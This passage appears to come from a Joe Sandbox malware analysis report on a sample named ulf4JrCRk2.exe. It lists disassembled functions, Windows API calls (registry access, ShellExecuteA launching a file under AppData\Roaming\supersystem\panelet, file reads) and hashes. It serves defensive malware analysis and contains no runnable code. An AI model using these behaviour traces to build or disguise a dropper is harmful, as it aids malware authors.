                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                                                • Instruction ID: a34a41eefb499e4b528ee0e15ee2ddc390ed289ee56622bd58176e85d3ab8876
                                                                                                • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                                                • Instruction Fuzzy Hash: 05015A7114520EEFEB228F64EC45AEB3FACEF15358F004036F944A6220D235D964CBA5
                                                                                                APIs
                                                                                                  • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                                                                • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402468
                                                                                                • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 0040247B
                                                                                                • RegCloseKey.KERNELBASE(?,?,?,%machinates%\vatter\udkastelses.Bss116,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: Enum$CloseOpenValue
                                                                                                • String ID:
                                                                                                • API String ID: 167947723-0
                                                                                                • Opcode ID: eed3c90d5c7e348fca0c4a701ef40ffaeb7a435824ebab2efc96f61ffb84ef12
                                                                                                • Instruction ID: 09a8887cd5e4729410dcfabe5c46d2a670465c21522258ca6cdcbf1033b2090e
                                                                                                • Opcode Fuzzy Hash: eed3c90d5c7e348fca0c4a701ef40ffaeb7a435824ebab2efc96f61ffb84ef12
                                                                                                • Instruction Fuzzy Hash: E8F08671904204FFD7119F659D8CEBF7A6CEB40748F10453EF441B62C0D6B95E41966A
                                                                                                APIs
                                                                                                • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\supersystem\panelet,?), ref: 00401E1E
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Roaming\supersystem\panelet, xrefs: 00401E09
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell
                                                                                                • String ID: C:\Users\user\AppData\Roaming\supersystem\panelet
                                                                                                • API String ID: 587946157-2983365704
                                                                                                • Opcode ID: 5b3355ea5905195ef51b073903dfe525f6ce29c1a6d67b87f90c054022239ed3
                                                                                                • Instruction ID: 92cbb6ba42742382510c3a8e41a68a30635fa0dc9ae6a59fa4a75f74f7b170a3
                                                                                                • Opcode Fuzzy Hash: 5b3355ea5905195ef51b073903dfe525f6ce29c1a6d67b87f90c054022239ed3
                                                                                                • Instruction Fuzzy Hash: 8DF0F6B3B041047ACB41ABB59E4AE5D2BA4EB41718F240A3BF400F71C2DAFC8841F728
                                                                                                APIs
                                                                                                  • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                                                                • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F8
                                                                                                • RegCloseKey.KERNELBASE(?,?,?,%machinates%\vatter\udkastelses.Bss116,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: cb37a1a76a93e2e641020109eab2c616a2fbad872fa47cbac7c87315435c727b
                                                                                                • Instruction ID: 0332112a018d0e07836895fa5cafc858bad159e104d866fff78bcbb739cef185
                                                                                                • Opcode Fuzzy Hash: cb37a1a76a93e2e641020109eab2c616a2fbad872fa47cbac7c87315435c727b
                                                                                                • Instruction Fuzzy Hash: C111C171905205EFDB11DF60CA889BEBBB4EF00344F20843FE442B62C0D2B84A41EB6A
                                                                                                APIs
                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
                                                                                                • Instruction ID: da56ad7cfcb2a9fecb994a09e4a0bd113f750103611445cd7b28aada07ee45e3
                                                                                                • Opcode Fuzzy Hash: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
                                                                                                • Instruction Fuzzy Hash: 2E012831B24210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D
                                                                                                APIs
                                                                                                  • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                                                                • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022DF
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004022E8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseDeleteOpenValue
                                                                                                • String ID:
                                                                                                • API String ID: 849931509-0
                                                                                                • Opcode ID: 8e6437201c4d01184a70f6be773875b8c7a361560ce53a8aacaaac3aabda72af
                                                                                                • Instruction ID: 2c42072c31bcbbe471fcd7c214f11599c8a5ac898b8b604777345a29c8a948e9
                                                                                                • Opcode Fuzzy Hash: 8e6437201c4d01184a70f6be773875b8c7a361560ce53a8aacaaac3aabda72af
                                                                                                • Instruction Fuzzy Hash: 65F04F72A04111ABDB51ABB49A8EAAE6268AB40318F14453BF501B61C1DAFC5E01A66E
                                                                                                APIs
                                                                                                • OleInitialize.OLE32(00000000), ref: 004050BE
                                                                                                  • Part of subcall function 00404038: SendMessageA.USER32(000103E4,00000000,00000000,00000000), ref: 0040404A
                                                                                                • OleUninitialize.OLE32(00000404,00000000), ref: 0040510A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeMessageSendUninitialize
                                                                                                • String ID:
                                                                                                • API String ID: 2896919175-0
                                                                                                • Opcode ID: 431dfcc76cf9dde98b5e7aaf7b5ad5106ef7ccd0ca4a168cf4dec9602718c729
                                                                                                • Instruction ID: bd05ba91e376626405d95ef9acebad21dc74d375a876cdf71cbeab3177fe6a51
                                                                                                • Opcode Fuzzy Hash: 431dfcc76cf9dde98b5e7aaf7b5ad5106ef7ccd0ca4a168cf4dec9602718c729
                                                                                                • Instruction Fuzzy Hash: B3F0F0F3A046009AEB216B14AC00B1777B4EBC4346F55C03EFF44B32A186B988428B6D
                                                                                                APIs
                                                                                                • ShowWindow.USER32(00000000), ref: 00401579
                                                                                                • ShowWindow.USER32(000103EA), ref: 0040158E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: ShowWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1268545403-0
                                                                                                • Opcode ID: c64c6d1f079b89554086766a5c5b018e70a08e7419b7e9e5f4a1fba6667fe9af
                                                                                                • Instruction ID: 8a385b190166ef4faee7ea7f7faf61a79327429c222f4cee9526e2a72d22cdd5
                                                                                                • Opcode Fuzzy Hash: c64c6d1f079b89554086766a5c5b018e70a08e7419b7e9e5f4a1fba6667fe9af
                                                                                                • Instruction Fuzzy Hash: 9FF0E577B08250BFC725CF64ED8086E77F5EB5531075444BFD102A3292C2B89D04DB18
                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\ulf4JrCRk2.exe,80000000,00000003), ref: 00405986
                                                                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCreate
                                                                                                • String ID:
                                                                                                • API String ID: 415043291-0
                                                                                                • Opcode ID: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                                                                                • Instruction ID: 21e5f81f3e52fa2c8f9e5bc24a994218dd140026ef3a1e453d479de883aad6ce
                                                                                                • Opcode Fuzzy Hash: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                                                                                • Instruction Fuzzy Hash: 94D09E31668301AFEF098F20DD16F2E7BA2EB84B00F10562CB682D40E0D6755815DB16
                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(?,?,00405575,?,?,00000000,00405758,?,?,?,?), ref: 00405962
                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405976
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                                                                                • Instruction ID: 52ea2c90687e5876e605324cdef58a02bfc8c1539d376b9eaaf3b2e35a2569c6
                                                                                                • Opcode Fuzzy Hash: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                                                                                • Instruction Fuzzy Hash: 33D0C972908520FBC2102728AD08C9BBB55EB582717018B32F865A22B0C7304C52CAA5
                                                                                                APIs
                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,76F93410,004034D6,?), ref: 004036A7
                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,76F93410,004034D6,?), ref: 004036BB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle
                                                                                                • String ID:
                                                                                                • API String ID: 2962429428-0
                                                                                                • Opcode ID: 2229e43d6289b38d5d47617bcce03355d5eaf097794c5503d34cf4d4932e4679
                                                                                                • Instruction ID: 89c4926621b3ed489ac8dfb39f115d293634e1e2b72de2a3854944cb7e34118e
                                                                                                • Opcode Fuzzy Hash: 2229e43d6289b38d5d47617bcce03355d5eaf097794c5503d34cf4d4932e4679
                                                                                                • Instruction Fuzzy Hash: 2DE08630500620B6D530AF7CAD455463A185B41335B608B22F474F22F1C7389E875EAC
                                                                                                APIs
                                                                                                • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401719
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: PathSearch
                                                                                                • String ID:
                                                                                                • API String ID: 2203818243-0
                                                                                                • Opcode ID: f45795dd4039b4ac79c1b788fb08f03ac0000c29c4d50ab2925c178598d74e3b
                                                                                                • Instruction ID: b1e2324c8c43f12db9182c34506a8a6b6d03d1e685c93adb476f6fabe5cadde0
                                                                                                • Opcode Fuzzy Hash: f45795dd4039b4ac79c1b788fb08f03ac0000c29c4d50ab2925c178598d74e3b
                                                                                                • Instruction Fuzzy Hash: 3CE0DFB2204100BBD740DB649D48AAB77A8EB10368F20863AE511E60C0E2B99902E229
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: Open
                                                                                                • String ID:
                                                                                                • API String ID: 71445658-0
                                                                                                • Opcode ID: ebfeba3ed9c8d95cb46d76ca19a6c1a04daa5e79448631d0a062a8db0bedbb5d
                                                                                                • Instruction ID: 087740a894708ae54e311fe38564fcb001a0ed9e3d0f4d4a62d19f1d4de25a1d
                                                                                                • Opcode Fuzzy Hash: ebfeba3ed9c8d95cb46d76ca19a6c1a04daa5e79448631d0a062a8db0bedbb5d
                                                                                                • Instruction Fuzzy Hash: 38E046B6250108AADB40EFA4EE4AF9537ECFB04700F008021BA08E7091CA78E5509B69
                                                                                                APIs
                                                                                                • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128A0,0040A8A0,004031C9,00409130,00409130,004030BB,004128A0,00004000,?,00000000,?), ref: 00405A0E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                                                                                • Instruction ID: b1acdbea0b5305796381949641a39caa05877223dc774253bf026a704a199e6f
                                                                                                • Opcode Fuzzy Hash: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                                                                                • Instruction Fuzzy Hash: 3AE0E632714159ABDF109E559C41FEB779CEF05350F044532F915E6150E231E8219FA5
